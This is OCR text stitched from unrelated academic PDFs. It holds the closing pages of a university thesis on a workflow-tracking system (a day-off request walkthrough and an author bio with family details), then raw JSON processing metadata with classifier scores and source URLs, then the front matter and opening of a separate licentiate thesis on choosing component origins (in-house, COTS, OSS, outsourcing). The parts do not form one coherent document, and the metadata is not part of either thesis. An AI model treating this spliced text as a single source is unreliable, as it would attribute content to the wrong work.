When Jimi is ready to send the request to his Manager, he will select the transition tab, select the transition option from the drop down list, then select the transition button. The request will be removed from Jimi’s list of pending tasks and appear as a pending task in his manager’s queue. Because the Auto-Look Up assignment strategy was selected for this transition, the system knows to automatically assign the task to Stacy Hutchings, who is listed as the only person for the Manager role. Figure B54 shows Stacy Hutchings’ pending queue after the request has been transitioned.
(Request A Day Off Example in Action, Cont’d)
When Stacy views the request, she sees the details of the request. The Comments tab in Figure B55 shows the transition history. The Transition tab in Figure B56 presents her with a new list of transition decisions. The Manager has the option to Approve or Deny the request.


(Request A Day Off Example in Action, Cont'd)
For this request, Stacy will select the Approve Request option then select the transition button. The request transitions automatically to the Closed state. Figure B57 shows the tasks listed in the Closed queue. Figure B58 shows the Comments tab when you view details on the request.
Figure B57: View Workflow Queue - Closed
Figure B58: View Instance Details - Comments Tab
To demonstrate what happens in the event the request is denied, Caitlyn Hutchings will initiate a request for the same day off. She will select the Add New Instance option, enter the details for the request, and when she is satisfied with her request, she will transition it to her manager. Figure B59 shows the validation error that occurs when a transition rule fails. In this example, Caitlyn has forgotten to select the type of day off for her request. The request will not transition until all errors are corrected.
![Validation Error Image]
Figure B59: View Instance Details - Validation Error
Figure B60 shows the request has transitioned successfully to the Manager role. When Caitlyn views her request, no longer in her pending list of tasks, the system reminds her the request is in View Only Mode and removes the ability to update, transition, and reassign the request.
Figure B60: View Instance Details - View Only Mode
The new request appears in the Manager's list of pending tasks shown in Figure B61. For this example, the Manager is going to select the Deny Request option then select the transition option without entering comments. Figure B62 shows the error message displayed.


After the Manager fills in the reason for denial, the system presents the Manager with a list of participants for assignment. The Manager would like to return the request to Caitlyn so she selects her name from the list then selects the assign button, see Figure B63.
Figure B63: Transition Tab: Select Participant
After denying the request, the request returns to Caitlyn's pending task queue with a status of Request Denied shown in Figure B64. Caitlyn has the ability to view the request and the reason for denial. Figure B65 shows the Transition tab with a single transition option of closing the instance.
Figure B64: Pending Tasks for Caitlyn Hutchings
Figure B65: View Instance Details - Transition Tab
Figure B66 shows both requests listed in the Closed task queue.
The purpose of the documentation was to demonstrate each of the components of the Workflow Generator and Tracking System and to provide a working example of how an end user would approach the task of creating and implementing a workflow.

<table>
<thead>
<tr>
<th>ID</th>
<th>Submit Date</th>
<th>Submit By</th>
<th>Version</th>
<th>Status</th>
<th>Assigned To</th>
<th>Status</th>
<th>Assigned To</th>
</tr>
</thead>
<tbody>
<tr>
<td>15</td>
<td>12/04/2005 2:57 PM</td>
<td>Jim Hutchings</td>
<td>1.0.0001</td>
<td>Personal Day</td>
<td>12/08/2005</td>
<td>Closed</td>
<td>Blaza Hutchings</td>
</tr>
<tr>
<td>17</td>
<td>12/04/2005 7:14 PM</td>
<td>Caitlyn Hutchings</td>
<td>1.0.0001</td>
<td>Personal Day</td>
<td>12/04/2005</td>
<td>Closed</td>
<td>Caitlyn Hutchings</td>
</tr>
</tbody>
</table>
Figure B66: The UNF System - View Workflow Queue Closed
Stacy Hutchings has a Bachelor of Arts degree from Flagler College in Secondary Mathematics Education, 1992, and expects to receive a Master of Science in Computer and Information Sciences from the University of North Florida, December 2005. Dr. Arturo Sánchez-Ruiz of the University of North Florida served as Stacy’s project director. Stacy is currently employed as a Senior Business Analyst at PHH Mortgage Company doing .NET web development and application support for the company’s internal departments. Stacy has been in her current position for only three months, but with the company for 4 years.
Stacy has on-going interests in both .NET and J2EE web development. Stacy’s academic work has included the use of Java, COBOL, and SQL. Married for the last 11 years, Stacy has two children, ages 8 and 9.
|
{"Source-Url": "https://digitalcommons.unf.edu/cgi/viewcontent.cgi?referer=&httpsredir=1&article=1268&context=etd", "len_cl100k_base": 13818, "olmocr-version": "0.1.53", "pdf-total-pages": 102, "total-fallback-pages": 0, "total-input-tokens": 165066, "total-output-tokens": 17953, "length": "2e13", "weborganizer": {"__label__adult": 0.00034499168395996094, "__label__art_design": 0.0008158683776855469, "__label__crime_law": 0.0002281665802001953, "__label__education_jobs": 0.011566162109375, "__label__entertainment": 0.00010854005813598631, "__label__fashion_beauty": 0.0001914501190185547, "__label__finance_business": 0.0013189315795898438, "__label__food_dining": 0.00031828880310058594, "__label__games": 0.0005164146423339844, "__label__hardware": 0.0007085800170898438, "__label__health": 0.00025534629821777344, "__label__history": 0.00031256675720214844, "__label__home_hobbies": 0.00016582012176513672, "__label__industrial": 0.0004150867462158203, "__label__literature": 0.00028061866760253906, "__label__politics": 0.0001885890960693359, "__label__religion": 0.0003173351287841797, "__label__science_tech": 0.00720977783203125, "__label__social_life": 0.00017189979553222656, "__label__software": 0.01439666748046875, "__label__software_dev": 0.95947265625, "__label__sports_fitness": 0.0001976490020751953, "__label__transportation": 0.00044465065002441406, "__label__travel": 0.00021648406982421875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 69040, 0.03169]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 69040, 0.17893]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 69040, 0.90382]], "google_gemma-3-12b-it_contains_pii": [[0, 364, false], [364, 775, null], [775, 1299, null], [1299, 1868, null], [1868, 3166, null], [3166, 4056, null], [4056, 5363, null], [5363, 5363, null], [5363, 6874, null], [6874, 7932, null], [7932, 8132, null], [8132, 9014, null], [9014, 9981, null], [9981, 10477, null], [10477, 11352, null], [11352, 12521, null], [12521, 13576, null], [13576, 14787, null], [14787, 15293, null], [15293, 16246, null], [16246, 17421, null], [17421, 18596, null], [18596, 18958, null], [18958, 20164, null], [20164, 21282, null], [21282, 22223, null], [22223, 23230, null], [23230, 23725, null], [23725, 24834, null], [24834, 25853, null], [25853, 26960, null], [26960, 28123, null], [28123, 29228, null], [29228, 30358, null], [30358, 31190, null], [31190, 32157, null], [32157, 33292, null], [33292, 34336, null], [34336, 35606, null], [35606, 36743, null], [36743, 37747, null], [37747, 38577, null], [38577, 39599, null], [39599, 40233, null], [40233, 41209, null], [41209, 42281, null], [42281, 42876, null], [42876, 43633, null], [43633, 44597, null], [44597, 44823, null], [44823, 44857, null], [44857, 45178, null], [45178, 45710, null], [45710, 45929, null], [45929, 46486, null], [46486, 46809, null], [46809, 47155, null], [47155, 47632, null], [47632, 48357, null], [48357, 48809, null], [48809, 49893, null], [49893, 50052, null], [50052, 50280, null], [50280, 50683, null], [50683, 51212, null], [51212, 52106, null], [52106, 52518, null], [52518, 53552, null], [53552, 54101, null], [54101, 54393, null], [54393, 55207, null], [55207, 55459, null], [55459, 56090, null], [56090, 56513, null], [56513, 56786, null], [56786, 57205, null], [57205, 57429, null], [57429, 58121, null], [58121, 58499, null], [58499, 59038, null], [59038, 59358, null], [59358, 59770, null], [59770, 60060, null], [60060, 60480, null], [60480, 60692, null], [60692, 61161, null], [61161, 61489, null], [61489, 61831, null], [61831, 62928, null], [62928, 63246, null], [63246, 63524, null], [63524, 63841, null], [63841, 64428, null], [64428, 64871, null], [64871, 65294, null], [65294, 65896, null], [65896, 66229, null], [66229, 66614, null], [66614, 66930, null], [66930, 67327, null], [67327, 68230, null], [68230, 69040, null]], "google_gemma-3-12b-it_is_public_document": [[0, 364, true], [364, 775, null], [775, 1299, null], [1299, 1868, null], [1868, 3166, null], [3166, 4056, null], [4056, 5363, null], [5363, 5363, null], [5363, 6874, null], [6874, 7932, null], [7932, 8132, null], [8132, 9014, null], [9014, 9981, null], [9981, 10477, null], [10477, 11352, null], [11352, 12521, null], [12521, 13576, null], [13576, 14787, null], [14787, 15293, null], [15293, 16246, null], [16246, 17421, null], [17421, 18596, null], [18596, 18958, null], [18958, 20164, null], [20164, 21282, null], [21282, 22223, null], [22223, 23230, null], [23230, 23725, null], [23725, 24834, null], [24834, 25853, null], [25853, 26960, null], [26960, 28123, null], [28123, 29228, null], [29228, 30358, null], [30358, 31190, null], [31190, 32157, null], [32157, 33292, null], [33292, 34336, null], [34336, 35606, null], [35606, 36743, null], [36743, 37747, null], [37747, 38577, null], [38577, 39599, null], [39599, 40233, null], [40233, 41209, null], [41209, 42281, null], [42281, 42876, null], [42876, 43633, null], [43633, 44597, null], [44597, 44823, null], [44823, 44857, null], [44857, 45178, null], [45178, 45710, null], [45710, 45929, null], [45929, 46486, null], [46486, 46809, null], [46809, 47155, null], [47155, 47632, null], [47632, 48357, null], [48357, 48809, null], [48809, 49893, null], [49893, 50052, null], [50052, 50280, null], [50280, 50683, null], [50683, 51212, null], [51212, 52106, null], [52106, 52518, null], [52518, 53552, null], [53552, 54101, null], [54101, 54393, null], [54393, 55207, null], [55207, 55459, null], [55459, 56090, null], [56090, 56513, null], [56513, 56786, null], [56786, 57205, null], [57205, 57429, null], [57429, 58121, null], [58121, 58499, null], [58499, 59038, null], [59038, 59358, null], [59358, 59770, null], [59770, 60060, null], [60060, 60480, null], [60480, 60692, null], [60692, 61161, null], [61161, 61489, null], [61489, 61831, null], [61831, 62928, null], [62928, 63246, null], [63246, 63524, null], [63524, 63841, null], [63841, 64428, null], [64428, 64871, null], [64871, 65294, null], [65294, 65896, null], [65896, 66229, null], [66229, 66614, null], [66614, 66930, null], [66930, 67327, null], [67327, 68230, null], [68230, 69040, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 69040, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 69040, null]], "pdf_page_numbers": [[0, 364, 1], [364, 775, 2], [775, 1299, 3], [1299, 1868, 4], [1868, 3166, 5], [3166, 4056, 6], [4056, 5363, 7], [5363, 5363, 8], [5363, 6874, 9], [6874, 7932, 10], [7932, 8132, 11], [8132, 9014, 12], [9014, 9981, 13], [9981, 10477, 14], [10477, 11352, 15], [11352, 12521, 16], [12521, 13576, 17], [13576, 14787, 18], [14787, 15293, 19], [15293, 16246, 20], [16246, 17421, 21], [17421, 18596, 22], [18596, 18958, 23], [18958, 20164, 24], [20164, 21282, 25], [21282, 22223, 26], [22223, 23230, 27], [23230, 23725, 28], [23725, 24834, 29], [24834, 25853, 30], [25853, 26960, 31], [26960, 28123, 32], [28123, 29228, 33], [29228, 30358, 34], [30358, 31190, 35], [31190, 32157, 36], [32157, 33292, 37], [33292, 34336, 38], [34336, 35606, 39], [35606, 36743, 40], [36743, 37747, 41], [37747, 38577, 42], [38577, 39599, 43], [39599, 40233, 44], [40233, 41209, 45], [41209, 42281, 46], [42281, 42876, 47], [42876, 43633, 48], [43633, 44597, 49], [44597, 44823, 50], [44823, 44857, 51], [44857, 45178, 52], [45178, 45710, 53], [45710, 45929, 54], [45929, 46486, 55], [46486, 46809, 56], [46809, 47155, 57], [47155, 47632, 58], [47632, 48357, 59], [48357, 48809, 60], [48809, 49893, 61], [49893, 50052, 62], [50052, 50280, 63], [50280, 50683, 64], [50683, 51212, 65], [51212, 52106, 66], [52106, 52518, 67], [52518, 53552, 68], [53552, 54101, 69], [54101, 54393, 70], [54393, 55207, 71], [55207, 55459, 72], [55459, 56090, 73], [56090, 56513, 74], [56513, 56786, 75], [56786, 57205, 76], [57205, 57429, 77], [57429, 58121, 78], [58121, 58499, 79], [58499, 59038, 80], [59038, 59358, 81], [59358, 59770, 82], [59770, 60060, 83], [60060, 60480, 84], [60480, 60692, 85], [60692, 61161, 86], [61161, 61489, 87], [61489, 61831, 88], [61831, 62928, 89], [62928, 63246, 90], [63246, 63524, 91], [63524, 63841, 92], [63841, 64428, 93], [64428, 64871, 94], [64871, 65294, 95], [65294, 65896, 96], [65896, 66229, 97], [66229, 66614, 98], [66614, 66930, 99], [66930, 67327, 100], [67327, 68230, 101], [68230, 69040, 102]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 69040, 0.00789]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
645cd1fb2dc5d3370015e57be4c98214d11ae0b2
|
[REMOVED]
|
{"Source-Url": "http://www.cse.msu.edu/~sandeep/publications/CK12ICDCN/main.pdf", "len_cl100k_base": 9000, "olmocr-version": "0.1.50", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 45222, "total-output-tokens": 11618, "length": "2e13", "weborganizer": {"__label__adult": 0.0004279613494873047, "__label__art_design": 0.0006461143493652344, "__label__crime_law": 0.0004444122314453125, "__label__education_jobs": 0.0025730133056640625, "__label__entertainment": 9.500980377197266e-05, "__label__fashion_beauty": 0.00020110607147216797, "__label__finance_business": 0.0004229545593261719, "__label__food_dining": 0.0003960132598876953, "__label__games": 0.0010595321655273438, "__label__hardware": 0.00191497802734375, "__label__health": 0.0006976127624511719, "__label__history": 0.0004432201385498047, "__label__home_hobbies": 0.0001729726791381836, "__label__industrial": 0.0010509490966796875, "__label__literature": 0.0003802776336669922, "__label__politics": 0.0003135204315185547, "__label__religion": 0.0006012916564941406, "__label__science_tech": 0.1309814453125, "__label__social_life": 0.00011235475540161131, "__label__software": 0.00794219970703125, "__label__software_dev": 0.84716796875, "__label__sports_fitness": 0.0004224777221679687, "__label__transportation": 0.0014238357543945312, "__label__travel": 0.0002510547637939453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 41819, 0.03633]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 41819, 0.47522]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 41819, 0.85311]], "google_gemma-3-12b-it_contains_pii": [[0, 2417, false], [2417, 5966, null], [5966, 9195, null], [9195, 11339, null], [11339, 14605, null], [14605, 16365, null], [16365, 19835, null], [19835, 23240, null], [23240, 26687, null], [26687, 27692, null], [27692, 31465, null], [31465, 32851, null], [32851, 34783, null], [34783, 38257, null], [38257, 41819, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2417, true], [2417, 5966, null], [5966, 9195, null], [9195, 11339, null], [11339, 14605, null], [14605, 16365, null], [16365, 19835, null], [19835, 23240, null], [23240, 26687, null], [26687, 27692, null], [27692, 31465, null], [31465, 32851, null], [32851, 34783, null], [34783, 38257, null], [38257, 41819, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 41819, null]], "pdf_page_numbers": [[0, 2417, 1], [2417, 5966, 2], [5966, 9195, 3], [9195, 11339, 4], [11339, 14605, 5], [14605, 16365, 6], [16365, 19835, 7], [19835, 23240, 8], [23240, 26687, 9], [26687, 27692, 10], [27692, 31465, 11], [31465, 32851, 12], [32851, 34783, 13], [34783, 38257, 14], [38257, 41819, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 41819, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
8959fd2b9c4f9ada18fb747b17fd16bfee8e0121
|
TOWARDS DECISION-MAKING TO CHOOSE AMONG DIFFERENT COMPONENT ORIGINS
Deepika Badampudi
Blekinge Institute of Technology
Licentiate Dissertation Series No. 2016:01
Department of Software Engineering
Towards Decision-Making to Choose Among Different Component Origins
Deepika Badampudi
Towards Decision-Making to Choose Among Different Component Origins
Deepika Badampudi
Licentiate Dissertation in Software Engineering
Department of Software Engineering
Blekinge Institute of Technology
SWEDEN
Context: The amount of software in solutions provided in various domains is continuously growing. These solutions are a mix of hardware and software solutions, often referred to as software-intensive systems. Companies seek to improve the software development process to avoid delays or cost overruns related to the software development.
Objective: The overall goal of this thesis is to improve the software development/building process to provide timely, high quality and cost efficient solutions. The objective is to select the origin of the components (in-house, outsource, components off-the-shelf (COTS) or open source software (OSS)) that facilitates the improvement. The system can be built of components from one origin or a combination of two or more (or even all) origins. Selecting a proper origin for a component is important to get the most out of a component and to optimize the development.
Method: It is necessary to investigate the component origins to make decisions to select among different origins. We conducted a case study to explore the existing challenges in software development. The next step was to identify factors that influence the choice to select among different component origins through a systematic literature review using a snowballing (SB) strategy and a database (DB) search. Furthermore, a Bayesian synthesis process is proposed to integrate the evidence from literature into practice.
Results: The results of this thesis indicate that the context of software-intensive systems such as domain regulations hinder the software development improvement. In addition to in-house development, alternative component origins (outsourcing, COTS, and OSS) are being used for software development. Several factors such as time, cost and license implications influence the selection of component origins. Solutions have been proposed to support the decision-making. However, these solutions consider only a subset of factors identified in the literature.
Conclusions: Each component origin has some advantages and disadvantages. Depending on the scenario, one component origin is more suitable than the others. It is important to investigate the different scenarios and suitability of the component origins, which is recognized as future work of this thesis. In addition, the future work is aimed at providing models to support the decision-making process.
Keywords: Component-based software development, component origin, decision-making, snowballing, database search, Bayesian synthesis.
OVERVIEW OF PUBLICATIONS
Papers included in the thesis:
Contribution statement
Deepika Badampudi is the lead author of all the chapters. As the lead author she took the responsibilities in designing, executing and reporting of the studies. The contributions to individuals chapters are as below:
**Chapter 2:** Deepika Badampudi designed the case study, participated in data collection by conducting the interviews, transcribed and analyzed all the interviews and reported the findings. The co-authors reviewed the case study design and commented on the final draft of the conference paper.
**Chapter 3:** Claes Wohlin contributed with the idea to conduct a systematic literature review. The review consists of two search strategies, Deepika Badampudi designed the review protocol and Claes Wohlin contributed to the design of the snowballing search strategy. Kai Petersen contributed in the database search strategy. Deepika Badampudi extracted the data from 18 (of 24) studies and wrote large parts of the final draft. Claes Wohlin and Kai Petersen reviewed and commented on the final draft of the journal paper.
**Chapter 4:** Claes Wohlin contributed with the idea to report experiences from conducting the snowballing search strategy. Deepika Badampudi contributed to the design of the study and reported the findings. Claes Wohlin and Kai Petersen commented and reviewed the final draft of the conference paper.
**Chapter 5:** Deepika Badampudi mainly contributed with the idea of the study. Claes Wohlin participated and contributed in all the brainstorming sessions. Deepika Badampudi reported the study and Claes Wohlin commented and reviewed the final draft of the conference paper.
Papers related but not included in the thesis:
Firstly I would like to sincerely thank my advisor Professor Claes Wohlin for his continuous guidance, support, immense knowledge and motivation throughout this thesis. I’m grateful for his timely feedback, constructive criticism and his willingness to listen and consider my ideas.
I would also like to thank my co-advisor Professor Tony Gorschek for his inputs. The support and insightful comments from my co-authors Kai Petersen, Samuel A. Fricker and Ana M. Moreno are much appreciated. I thank my colleagues for providing a supportive work environment. Also, I thank Farnaz, Indira and Siva for the fun times and most importantly their friendship.
Words cannot express my true gratitude and love towards my husband, Gurudutt Velpula, who has been supporting and helping me to remain positive even through difficult times.
I thank my parents, Kishore and Indira for their love and care, my sister, Deepthi for being my best friend and my niece Kanisha for all the happy times.
CONTENTS
1 INTRODUCTION .................................................. 1
1 Overview .................................................. 1
2 Background ................................................. 3
3 Contribution and Research Gaps ......................... 4
3.1 Chapter 2 ............................................... 4
3.2 Chapter 3 ............................................... 5
3.3 Chapter 4 ............................................... 6
3.4 Chapter 5 ............................................... 6
3.5 Research questions .................................... 6
4 Research Methodology ...................................... 8
4.1 Case study (Chapter 2) ............................... 8
4.2 Systematic literature review (Chapters 3 and 4) .... 9
5 Overview of the Chapters .................................. 10
5.1 Chapter 2: Perspectives on productivity and delays in large-scale agile projects ...................... 10
5.2 Chapter 3: Software component decision-making: in-house, OSS, COTS or outsourcing - A systematic literature review .................................................. 11
5.3 Chapter 4: Experiences from using snowballing and database searches in systematic literature studies ................................................................. 12
5.4 Chapter 5: Bayesian synthesis in software engineering: Method and illustration ...................... 13
6 Conclusions and Future Work .............................. 13
2 PERSPECTIVES ON PRODUCTIVITY AND DELAYS IN LARGE-SCALE AGILE PROJECTS ........................................... 17
1 Introduction .................................................. 17
2 Related Work .................................................. 19
3 Research Methodology ...................................... 20
4 Results ....................................................... 23
4.1 The development organization ......................... 23
4.2 Challenges that affected productivity and delays 24
4.3 Causes for the challenges .............................. 25
| 4.4 | Impact of challenges on productivity and delay of scrum teams | 30 |
| 4.5 | Impact of challenges on productivity and delay of global project teams | 30 |
| 5 | Discussion | 36 |
| 6 | Conclusions | 38 |
3 SOFTWARE COMPONENT DECISION-MAKING: IN-HOUSE, OSS, COTS OR OUTSOURCING - A SYSTEMATIC LITERATURE REVIEW
1 Introduction | 42
2 Related Work | 44
3 Method | 46
3.1 Need for the review | 46
3.2 Study identification | 47
3.3 Data extraction and classification | 54
3.4 Quality assessment | 55
3.5 Analysis | 57
3.6 Validity threats | 60
4 Results | 62
4.1 Research types, methods and quality (RQ1) | 63
4.2 Influencing factors (RQ2) | 67
4.3 Solutions (RQ3) | 78
5 Discussion | 81
5.1 COTS over OSS | 82
5.2 OSS over COTS | 83
5.3 In-house over OSS and COTS | 84
5.4 COTS and OSS over In-house | 84
5.5 Research gaps | 85
6 Conclusion | 87
7 Acknowledgement | 89
4 EXPERIENCES FROM USING SNOWBALLING AND DATABASE SEARCHES IN SYSTEMATIC LITERATURE STUDIES
1 Introduction | 92
2 Related Work | 93
3 Research Method | 94
3.1 Details of snowballing | 95
3.2 Details of database search | 97
3.3 Research questions ........................................ 98
4 Results .................................................. 100
4.1 Evolution of the SB process (RQ1) .................. 100
4.2 Efficiency of SB (RQ2) ............................. 105
4.3 Reliability of SB (RQ3) .............................. 111
5 Discussion ............................................... 117
6 Conclusion ............................................... 118
5 BAYESIAN SYNTHESIS IN SOFTWARE ENGINEERING:
METHOD AND ILLUSTRATION .......................... 121
1 Introduction .......................................... 122
2 Background and Related Work ......................... 124
2.1 Overview of Bayesian synthesis .................. 124
2.2 Bayesian synthesis in health research ........ 125
2.3 Synthesis in software engineering ............. 127
2.4 Bayesian in software engineering ............. 127
3 Bayesian Synthesis - Method Description .......... 128
3.1 Step 1: The prior probability ................. 128
3.2 Step 2: The likelihood ......................... 129
3.3 Step 3: The posterior probabilities - Refining prior probabilities .......... 132
4 Illustration 1 ..................................... 136
4.1 Step 1: Prior probability ..................... 136
4.2 Step 2: Likelihood ............................ 136
4.3 Step 3: Posterior probability - Refining prior probability ............... 140
5 Illustration 2 ..................................... 141
6 Discussion with Alternatives ...................... 146
7 Conclusions ......................................... 146
REFERENCES ............................................. 149
<table>
<thead>
<tr>
<th>Figure</th>
<th>Title</th>
<th>Page</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Overview of the thesis</td>
<td>2</td>
</tr>
<tr>
<td>2</td>
<td>Mapping of research questions and objectives</td>
<td>7</td>
</tr>
<tr>
<td>3</td>
<td>Thesis future work</td>
<td>14</td>
</tr>
<tr>
<td>4</td>
<td>Decision levels</td>
<td>44</td>
</tr>
<tr>
<td>5</td>
<td>Snowball search process</td>
<td>52</td>
</tr>
<tr>
<td>6</td>
<td>Database search process</td>
<td>53</td>
</tr>
<tr>
<td>7</td>
<td>Research types and studied combinations of component origins</td>
<td>64</td>
</tr>
<tr>
<td>8</td>
<td>Research methods and studied combinations of component origins</td>
<td>65</td>
</tr>
<tr>
<td>9</td>
<td>Positive and negative influences of project metrics factors.</td>
<td>72</td>
</tr>
<tr>
<td>10</td>
<td>Positive and negative influences of external factors.</td>
<td>76</td>
</tr>
<tr>
<td>11</td>
<td>Positive and negative influences of software development process factors.</td>
<td>79</td>
</tr>
<tr>
<td>12</td>
<td>Trade-offs for COTS and OSS factors</td>
<td>82</td>
</tr>
<tr>
<td>13</td>
<td>Trade-offs for in-house, COTS and OSS factors</td>
<td>84</td>
</tr>
<tr>
<td>14</td>
<td>Evolution of identified papers</td>
<td>101</td>
</tr>
<tr>
<td>15</td>
<td>Citation matrix</td>
<td>104</td>
</tr>
<tr>
<td>16</td>
<td>Venn diagram for the overlapping papers</td>
<td>112</td>
</tr>
<tr>
<td>17</td>
<td>Options coverage</td>
<td>113</td>
</tr>
<tr>
<td>18</td>
<td>Dimension coverage</td>
<td>114</td>
</tr>
<tr>
<td>19</td>
<td>Three steps of Bayesian synthesis</td>
<td>128</td>
</tr>
<tr>
<td>20</td>
<td>Division of likelihood calculation</td>
<td>131</td>
</tr>
<tr>
<td>21</td>
<td>Four different approaches to refine prior probabilities</td>
<td>134</td>
</tr>
</tbody>
</table>
LIST OF TABLES
Table 1 Challenges that affected productivity and delays in the agile projects (italics: quotes) .............................................. 27
Table 2 Conditions that gave rise to productivity and delay-affecting challenges (italics: quotes) ............................................. 29
Table 3 Impact of challenges on scrum team (italics: quotes) ................................................................................................. 33
Table 4 Impact of challenges on global projects (italics: quotes) ............................................................................................... 35
Table 5 Secondary and primary studies related to the different decision levels ................................................................. 45
Table 6 Systematic reviews related to individual component origins .................................................................................... 45
Table 7 Inclusion and exclusion decision rules ...................................................................................................................... 50
Table 8 Number of hits for database search .......................................................................................................................... 53
Table 9 Search type and number of relevant papers ................................................................................................................ 54
Table 10 Data extraction form ................................................................................................................................................... 54
Table 11 Rules defining the themes ....................................................................................................................................... 59
Table 12 Total number of Primary studies per comparison category .................................................................................... 62
Table 13 Research types ............................................................................................................................................................ 64
Table 14 Research methods .................................................................................................................................................... 65
Table 15 Domains of the primary studies ............................................................................................................................. 65
Table 16 Rigor and relevance scores of the empirical studies .............................................................................................. 66
Table 17 Primary studies discussing influencing factors for component origin (RQ2) .............................................................. 67
Table 18 High-level themes, themes and codes ....................................................................................................................... 69
Table 19 Project metrics factors ............................................................................................................................................. 70
Table 20 External factors .......................................................................................................................................................... 73
Table 21 Software development process factors .................................................................................................................. 76
Table 22 Primary studies proposing solutions for choosing a component origin (RQ3) .......................................................... 79
Table 23 Advantages of component origins .......................................................................................................................... 82
| Table 24 | Mapping of factors influencing the decision and factors considered in the solutions | 86 |
| Table 25 | Nine search strings used by SB | 96 |
| Table 26 | Inclusion and exclusion decision rules | 98 |
| Table 27 | Search strings used by database search | 98 |
| Table 28 | Compliance with the SB guidelines | 103 |
| Table 29 | Efficiency of each iteration | 106 |
| Table 30 | Revised efficiency of each iteration | 106 |
| Table 31 | Comparison on backward Snowballing (BSB) and forward Snowballing (FSB) | 107 |
| Table 32 | Efficiency comparison | 111 |
| Table 33 | Conclusion analysis | 116 |
| Table 34 | Prior probabilities - Practitioner’s experience/opinion | 137 |
| Table 35 | Data extraction from non-empirical and empirical research papers | 138 |
| Table 36 | Context and quality of primary studies | 139 |
| Table 37 | Likelihood based on empirical and non-empirical research papers | 139 |
| Table 38 | Revised probabilities | 141 |
| Table 39 | Refining probability by discussing internal and external conflicts | 142 |
| Table 40 | Refining probability by discussing internal conflicts | 144 |
| Table 41 | Refining probability by discussing external conflicts | 145 |
| Table 42 | Refining probability by discussing conflicts only at the end | 145 |
**ACRONYMS**
**CBSE** Components-based software engineering
**COTS** components off-the-shelf
<table>
<thead>
<tr>
<th>Abbreviation</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>OSS</td>
<td>open source software</td>
</tr>
<tr>
<td>SB</td>
<td>snowballing</td>
</tr>
<tr>
<td>FSB</td>
<td>forward Snowballing</td>
</tr>
<tr>
<td>BSB</td>
<td>backward Snowballing</td>
</tr>
<tr>
<td>DB</td>
<td>database</td>
</tr>
</tbody>
</table>
INTRODUCTION
1 OVERVIEW
The use of software is becoming more and more common in solutions provided by different domains such as automotive, automation, health and telecommunication. Systems that consist of large amounts of software that provides value to its users are referred to as software-intensive systems. Companies are constantly seeking to improve the software development/building process to gain profit and competitive advantage. The improvements are usually aimed to provide timely, high quality and cost efficient solutions.
Components-based software engineering (CBSE) is known to increase productivity, save costs, increase quality and reusability [105]. CBSE promotes the development for reuse and building from existing software components [105]. Different alternatives to in-house development such as outsourcing [59], adopting COTS [11] and OSS [39] components are gaining popularity. The different alternatives are referred to as component origins.
Like any other technology or process, no component origin is universally good or universally bad, some component origins are more appropriate than others based on the context of the projects and the organizations. Therefore, it is important to understand how the component origins are traded-off, i.e. what criteria are used to select the component origins in which context using what process, techniques or tools. It is also important to understand the challenges of developing software-intensive systems. Knowing the limitations or shortcomings of in-house development for software-intensive systems will help the decision-makers to evaluate if the existing challenges of in-house development can be mitigated by considering the alternative component origins.
The overall research goal is to provide a decision-support system for selecting component origins. Figure 1 depicts the focus of this
thesis to explore the challenges in in-house development and the trade-off between the different component origins.
We begin by exploring the in-house development environment through a case study [115]. Five software-intensive large-scale agile projects from different domains are investigated. The investigation allowed to identify challenges that lead to productivity issues and delays in software-intensive systems (Chapter 2).
